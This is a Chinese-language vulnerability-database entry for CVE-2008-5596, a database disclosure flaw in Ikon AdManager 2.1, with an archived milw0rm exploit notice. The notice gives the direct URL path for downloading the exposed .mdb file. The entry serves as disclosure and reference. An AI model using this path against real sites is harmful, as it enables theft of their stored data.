Ikon AdManager ikonBAnner_AdManager.mdb敏感信息泄漏漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1116963 漏洞类型 权限许可和访问控制
发布时间 2008-12-07 更新时间 2008-12-16
CVE编号 CVE-2008-5596 CNNVD-ID CNNVD-200812-281
漏洞平台 ASP CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/7372
https://www.securityfocus.com/bid/84648
https://cxsecurity.com/issue/WLB-2008120149
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200812-281
|漏洞详情
IkonAdManager是一款功能强大的广告和横幅管理工具。IkonAdManager2.1及其早期版本在WEB根目录下储存敏感信息并未给予足够的访问控制,这会允许远程攻击者可以借助向ikonBAnner_AdManager.mdb提交一个直接的请求,下载数据库文件。
|漏洞EXP
####################################################################################################
# Ikon AdManager 2.1 (ikonBAnner_AdManager.mdb) Database Disclosure Vulnerability                  #
# © Ghost Hacker - REAL-H.COM                                                                      #
####################################################################################################
#[~] Author : Ghost Hacker                                                                         #
#[~] Homepage : http://Real-h.com                                                                  #
#[~] Contact Me : Ghost-r00t[at]Hotmail[dot]com                                                    #
#[~] Bug : Database Disclosure                                                                     #
#[~] Name Script : Ikon AdManager 2.1                                                              #
#[~] Download : http://www.dotnetindex.com/downloads/easy_download_getinfo.asp?id=7                #
####################################################################################################
#[~]Exploit                                                                                        #
# http://xxxx.com/[path]/database/ikonBAnner_AdManager.mdb                                         #
################# ###################################################################################
#[~]Greets :                                                                                       #
# Mr.SaFa7 [v4-team.com] , All Members Real-h.com and v4-team.net , All My Friends (3ed mobark)    #
####################################################################################################

# milw0rm.com [2008-12-07]
|受影响的产品
dotnetindex Ikon Admanager 2.1
|参考资料

来源:MILW0RM
名称:7372
链接:http://www.milw0rm.com/exploits/7372
来源:SREASON
名称:4755
链接:http://securityreason.com/securityalert/4755
来源:SECUNIA
名称:33029
链接:http://secunia.com/advisories/33029